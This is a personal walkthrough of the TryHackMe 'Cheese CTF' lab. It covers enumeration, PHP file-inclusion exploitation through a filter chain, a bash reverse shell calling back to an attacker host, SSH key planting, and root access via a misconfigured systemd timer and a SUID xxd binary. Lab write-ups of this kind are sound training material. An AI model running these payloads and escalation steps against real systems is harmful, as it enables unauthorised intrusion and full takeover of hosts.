TryHackMe: Cheese CTF

The Cheese CTF was a great room with new things for me to learn, yet i’m still relying too much on write-ups. The problem is i don’t really feel stuck, because right after looking at write-ups i understand what to do and feel more motivated…my mind tricks me into thinking im stuck. Working on it tho, in every room now i have a file where i point out what i’m doing wrong and after completing the rooms i’ll go and try to fix the issues from before on the next one, and so on. Overall i’m loving cybersecurity, it’s just that i get kinda lost when doing things.

https://tryhackme.com/r/room/cheesectfv10

Initial Enumeration

Nmap Scan

The nmap scan doesn’t retrieve anything good since it has port spoofing, but if we filter to the top 50 ports we can see some useful content:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 10.10.1.113 --top-ports 50 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-27 10:23 GMT
Nmap scan report for 10.10.1.113
Host is up (0.056s latency).

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
26/tcp    open  rsftp
53/tcp    open  domain
80/tcp    open  http
81/tcp    open  hosts2-ns
110/tcp   open  pop3
111/tcp   open  rpcbind
113/tcp   open  ident
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
179/tcp   open  bgp
199/tcp   open  smux
443/tcp   open  https
445/tcp   open  microsoft-ds
465/tcp   open  smtps
514/tcp   open  shell
515/tcp   open  printer
548/tcp   open  afp
554/tcp   open  rtsp
587/tcp   open  submission
646/tcp   open  ldp
993/tcp   open  imaps
995/tcp   open  pop3s
1025/tcp  open  NFS-or-IIS
1026/tcp  open  LSA-or-nterm
1027/tcp  open  IIS
1433/tcp  open  ms-sql-s
1720/tcp  open  h323q931
1723/tcp  open  pptp
2000/tcp  open  cisco-sccp
2001/tcp  open  dc
3306/tcp  open  mysql
3389/tcp  open  ms-wbt-server
5060/tcp  open  sip
5666/tcp  open  nrpe
5900/tcp  open  vnc
6001/tcp  open  X11:1
8000/tcp  open  http-alt
8008/tcp  open  http
8080/tcp  open  http-proxy
8443/tcp  open  https-alt
8888/tcp  open  sun-answerbook
10000/tcp open  snet-sensor-mgmt
32768/tcp open  filenet-tms
49152/tcp open  unknown
49154/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 2.54 seconds

Web 80

While checking the top ports we find a website on port 80:

Gobuster Scan

Not much to see, an index file and a login page so we do a simple gobuster scan:

┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ".html,.txt,.php" -t 25 --timeout 20s -u http://10.10.1.113:80/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.1.113:80/
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Timeout:                 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 1759]
/login.php            (Status: 200) [Size: 834]
/users.html           (Status: 200) [Size: 377]
/images               (Status: 301) [Size: 315] [--> http://10.10.1.113/images/]
/messages.html        (Status: 200) [Size: 448]
/orders.html          (Status: 200) [Size: 380]
/server-status        (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

We see 3 interesting pages:

• messages.html
• orders.html
• users.html

users.html and order.html were empty but messages.html had a link:

When pressed, the link sends us to the following url:

http://10.10.1.113/secret-script.php?file=php://filter/resource=supersecretmessageforadmin

Reverse Shell

If we convert it to base64 we could retrieve the content from the script.php file and see what we are working with:

Now we use CyberChef to decode the text:

We see that it’s using include so now we could look for a way to get a reverse shell in the file parameter. Doing a quick search we find the following repository:

It contains a file called php_filter_chain_generator.py that we will use to generate a filter chain to run a reverse shell:

┌──(venv)─(kali㉿kali)-[~/Desktop]
└─$ python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/[REDACTED]/4444 0>&1\"')?>" | grep "^php" > reverse_shell.txt 

To send the file we will use curl, but first we need a listener on port 4444:

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444 
listening on [any] 4444 ...

After that we can send the payload:

┌──(kali㉿kali)-[~/Desktop]
└─$ curl "http://10.10.1.113/secret-script.php?file=$(cat reverse_shell.txt)"

And we are in:

connect to [REDACTED] from (UNKNOWN) [10.10.1.113] 37868
bash: cannot set terminal process group (852): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cheesectf:/var/www/html$ 

When enumerating we find a user home directory called comte which has the user.txt file but we don’t have permission to open it.

But we also find the .ssh directory that is readable and has the authorized_keys file inside:

www-data@cheesectf: /home/comte$ ls -alh 
total 44K
drwxr-xr-x 4 comte comte 4.0K Sep 28 03:42 .
drwxr-xr-x 3 root root   4.0K Sep 27 17:04 ..
-rw------- 1 comte comte   55 Sep 28 03:39 .Xauthority
-rw------- 1 comte comte   19 Sep 28 03:42 .bash_history
-rw-r--r-- 1 comte comte  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 comte comte 3.7K Feb 25  2020 .bashrc
drwx------ 2 comte comte 4.0K Sep 27 17:05 .cache
-rw-r--r-- 1 comte comte  807 Feb 25  2020 .profile
drwxr-xr-x 2 comte comte 4.0K Sep 27 17:04 .ssh
-rw-r--r-- 1 comte comte    0 Sep 27 17:06 .sudo_as_admin_successful
-rw‒‒‒‒‒‒‒ 1 comte comte 4.2K Sep 15 07:45 user.txt
www-data@cheesectf: /home/comte$

www-data@cheesectf: /home/comte/.ssh$ ls -alh 
drwxr-xr-x 2 comte comte 4.0K Sep 27 17:04 .
drwxr-xr-x 4 comte comte 4.0K Sep 28 03:42 ..
-rw-rw-rw- 1 comte comte 0 Sep 27 17:04 authorized_keys

SSH with authorized_keys

comte

We could now generate a key of our own and put it inside authorized_keys since we have the permissions to do so.

The first step is generating a key with the ssh-keygen command:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh-keygen -t rsa   
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa
Enter passphrase for "id_rsa" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in yes
Your public key has been saved in id_rsa.pub
...

Two files are created:

• id_rsa
• id_rsa.pub

To be able to access comte we will read the content of the .pub file, copy it, and put it inside authorized_keys:

www-data@cheesectf:/home/comte/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPgFk1ElMSGwQI2SjFVI2Mwn6MY9hLrEYvRP6Lj/WC25LHwh3C0tEnN5LvwrFgWHeffpPC9P3jK69DGJ4VeWVJkRJ6vh9Y67Z81DAfemUIz1/OoGSbQpUA0aNv8klvTTDGGRo+WGNuUcjvA0H/GmE/m5iIUQ+y8jDla7lQnlI+B4V1Q9o6ChFqFfIracWZ42cz5YU8PUsBAqw52wx91Vfxf0xuPbog5ZXfbokjI2xBAPYAdIbZx0JbKIDlp3RIaaZufbDfNxiIg5COBJ/RggAQjL8y1nu7CI7NmRBkM6MP6v1YLZR7tbyG2WUNsuix58yfLEurgd+KNNuEiclV7l0iJQOMEK0kPY/FaAatQRLaNV4fwVX0uAAKqTjqq4YxFLn2vctfqFmbOo+xjThdRIWcbje3GeqBdxLFxDYPv3fYin8An6CwrUqgrucaGbXkbb6X/krDXYgPNNVM2vU4eY70B2/77jfq1j1kFNSgnUpd7MEu4SlRDZh8dTAp1toJTJ0= kali@kali' > authorized_keys

Now that our key is inside we are able to log into comte through ssh on our machine and read the user.txt file:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_rsa comte@10.10.1.113
...
comte@cheesectf:~$ ls
snap  user.txt
comte@cheesectf:~$ cat user.txt
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡾⠋⠀⠉⠛⠻⢶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⠟⠁⣠⣴⣶⣶⣤⡀⠈⠉⠛⠿⢶⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⡿⠃⠀⢰⣿⠁⠀⠀⢹⡷⠀⠀⠀⠀⠀⠈⠙⠻⠷⣶⣤⣀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠋⠀⠀⠀⠈⠻⠷⠶⠾⠟⠁⠀⠀⣀⣀⡀⠀⠀⠀⠀⠀⠉⠛⠻⢶⣦⣄⡀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⠁⠀⠀⢀⣀⣀⡀⠀⠀⠀⠀⠀⠀⣼⠟⠛⢿⡆⠀⠀⠀⠀⠀⣀⣤⣶⡿⠟⢿⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⡿⠋⠀⠀⣴⡿⠛⠛⠛⠛⣿⡄⠀⠀⠀⠀⠻⣶⣶⣾⠇⢀⣀⣤⣶⠿⠛⠉⠀⠀⠀⢸⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠟⠀⠀⠀⠀⢿⣦⡀⠀⠀⠀⣹⡇⠀⠀⠀⠀⠀⣀⣤⣶⡾⠟⠋⠁⠀⠀⠀⠀⠀⣠⣴⠾⠇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⡿⠁⠀⠀⠀⠀⠀⠀⠙⠻⠿⠶⠾⠟⠁⢀⣀⣤⡶⠿⠛⠉⠀⣠⣶⠿⠟⠿⣶⡄⠀⠀⣿⡇⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣶⠟⢁⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⠾⠟⠋⠁⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⣼⡇⠀⠀⠙⢷⣤⡀
⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⠟⠁⠀⣾⡏⢻⣷⠀⠀⠀⢀⣠⣴⡶⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⣷⣤⣤⣴⡟⠀⠀⠀⠀⠀⢻⡇
⠀⠀⠀⠀⠀⠀⣠⣾⠟⠁⠀⠀⠀⠙⠛⢛⣋⣤⣶⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠁⠀⠀⠀⠀⠀⠀⢸⡇
⠀⠀⠀⠀⣠⣾⠟⠁⠀⢀⣀⣤⣤⡶⠾⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣤⣤⣤⣤⡀⠀⠀⠀⠀⠀⢸⡇
⠀⠀⣠⣾⣿⣥⣶⠾⠿⠛⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣶⠶⣶⣤⣀⠀⠀⠀⠀⠀⢠⡿⠋⠁⠀⠀⠀⠈⠉⢻⣆⠀⠀⠀⠀⢸⡇
⠀⢸⣿⠛⠉⠁⠀⢀⣠⣴⣶⣦⣀⠀⠀⠀⠀⠀⠀⠀⣠⡿⠋⠀⠀⠀⠉⠻⣷⡀⠀⠀⠀⣿⡇⠀⠀⠀⠀⠀⠀⠀⠘⣿⠀⠀⠀⠀⢸⡇
⠀⢸⣿⠀⠀⠀⣴⡟⠋⠀⠀⠈⢻⣦⠀⠀⠀⠀⠀⢰⣿⠁⠀⠀⠀⠀⠀⠀⢸⣷⠀⠀⠀⢻⣧⠀⠀⠀⠀⠀⠀⠀⢀⣿⠀⠀⠀⠀⢸⡇
⠀⢸⡇⠀⠀⠀⢿⡆⠀⠀⠀⠀⢰⣿⠀⠀⠀⠀⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⣸⡟⠀⠀⠀⠀⠙⢿⣦⣄⣀⣀⣠⣤⡾⠋⠀⠀⠀⠀⢸⡇
⠀⢸⡇⠀⠀⠀⠘⣿⣄⣀⣠⣴⡿⠁⠀⠀⠀⠀⠀⠀⢿⣆⠀⠀⠀⢀⣠⣾⠟⠁⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠀⠀⠀⣀⣤⣴⠿⠃
⠀⠸⣷⡄⠀⠀⠀⠈⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⠿⠿⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⡶⠟⠋⠉⠀⠀⠀
⠀⠀⠈⢿⣆⠀⠀⠀⠀⠀⠀⠀⣀⣤⣴⣶⣶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣴⡶⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⢨⣿⠀⠀⠀⠀⠀⠀⣼⡟⠁⠀⠀⠀⠹⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⠿⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⣠⡾⠋⠀⠀⠀⠀⠀⠀⢻⣇⠀⠀⠀⠀⢀⣿⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⢠⣾⠋⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣤⣤⣤⣴⡿⠃⠀⠀⣀⣤⣶⠾⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⣀⣠⣴⡾⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⡶⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⡇⠀⠀⠀⠀⣀⣤⣴⠾⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢻⣧⣤⣴⠾⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠘⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀

THM{REDACTED}
comte@cheesectf:~$ 

While enumerating, when doing sudo -l, we find a weird service called exploit.timer:

comte@cheesectf:~$ sudo -l
User comte may run the following commands on cheesectf:
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) NOPASSWD: /bin/systemctl restart exploit.timer
    (ALL) NOPASSWD: /bin/systemctl start exploit.timer
    (ALL) NOPASSWD: /bin/systemctl enable exploit.timer

Navigating to /etc/systemd/system folder we find two files:

• exploit.service
• exploit.timer

Reading the two we see that exploit.timer doesn’t do much:

comte@cheesectf:~$ cat /etc/systemd/system/exploit.timer
[Unit]
Description=Exploit Timer

[Timer]
OnBootSec=

[Install]
WantedBy=timers.target

And exploit.service copies the xxd binary to /opt and adds SUID permissions:

comte@cheesectf:~$ cat /etc/systemd/system/exploit.service
[Unit]
Description=Exploit Service

[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"

When trying to start the service it gives an error:

comte@cheesectf:~$ sudo /bin/systemctl start exploit.timer
Failed to start exploit.timer: Unit exploit.timer has a bad unit file setting.
See system logs and 'systemctl status exploit.timer' for details.

To fix this issue we just have to add a value to the [Timer] on exploit.timer:

comte@cheesectf:~$ nano /etc/systemd/system/exploit.timer
comte@cheesectf:~$ cat /etc/systemd/system/exploit.timer
[Unit]
Description=Exploit Timer

[Timer]
OnBootSec=0

[Install]
WantedBy=timers.target

Now we can start the service with no problems:

comte@cheesectf:~$ sudo /bin/systemctl daemon-reload
comte@cheesectf:~$ sudo /bin/systemctl start exploit.timer
comte@cheesectf:~$ systemctl status exploit.timer
● exploit.timer - Exploit Timer
     Loaded: loaded (/etc/systemd/system/exploit.timer; disabled; vendor preset: enabled)
     Active: active (elapsed) since Wed 2024-09-25 02:41:41 UTC; 4s ago
    Trigger: n/a
   Triggers: ● exploit.service
comte@cheesectf:~$ ls -la /opt
total 28
drwxr-xr-x  2 root root  4096 Sep 25 02:41 .
drwxr-xr-x 19 root root  4096 Sep 27  2023 ..
-rwsr-sr-x  1 root root 18712 Sep 25 02:41 xxd

root

Looking at GTFOBins we find the xxd binary with the file write option, we could use this to get a private key to log into root with the same method as before:

LFILE=file_to_write
echo DATA | xxd | xxd -r - "$LFILE"

Since we already have an id_rsa file we just have to send the content to the authorized_keys file:

comte@cheesectf:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPgFk1ElMSGwQI2SjFVI2Mwn6MY9hLrEYvRP6Lj/WC25LHwh3C0tEnN5LvwrFgWHeffpPC9P3jK69DGJ4VeWVJkRJ6vh9Y67Z81DAfemUIz1/OoGSbQpUA0aNv8klvTTDGGRo+WGNuUcjvA0H/GmE/m5iIUQ+y8jDla7lQnlI+B4V1Q9o6ChFqFfIracWZ42cz5YU8PUsBAqw52wx91Vfxf0xuPbog5ZXfbokjI2xBAPYAdIbZx0JbKIDlp3RIaaZufbDfNxiIg5COBJ/RggAQjL8y1nu7CI7NmRBkM6MP6v1YLZR7tbyG2WUNsuix58yfLEurgd+KNNuEiclV7l0iJQOMEK0kPY/FaAatQRLaNV4fwVX0uAAKqTjqq4YxFLn2vctfqFmbOo+xjThdRIWcbje3GeqBdxLFxDYPv3fYin8An6CwrUqgrucaGbXkbb6X/krDXYgPNNVM2vU4eY70B2/77jfq1j1kFNSgnUpd7MEu4SlRDZh8dTAp1toJTJ0= kali@kali' > authorized_keys | xxd | /opt/xxd -r - /root/.ssh/authorized_keys

We can now log into root the same way as before and read the root.txt file:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_ed25519 root@10.10.1.113           
...
root@cheesectf:~# ls
root.txt  snap
root@cheesectf:~# cat root.txt
      _                           _       _ _  __
  ___| |__   ___  ___  ___  ___  (_)___  | (_)/ _| ___
 / __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | |  __/  __/\__ \  __/ | \__ \ | | |  _|  __/
 \___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_|  \___|

THM{REDACTED}
root@cheesectf:~#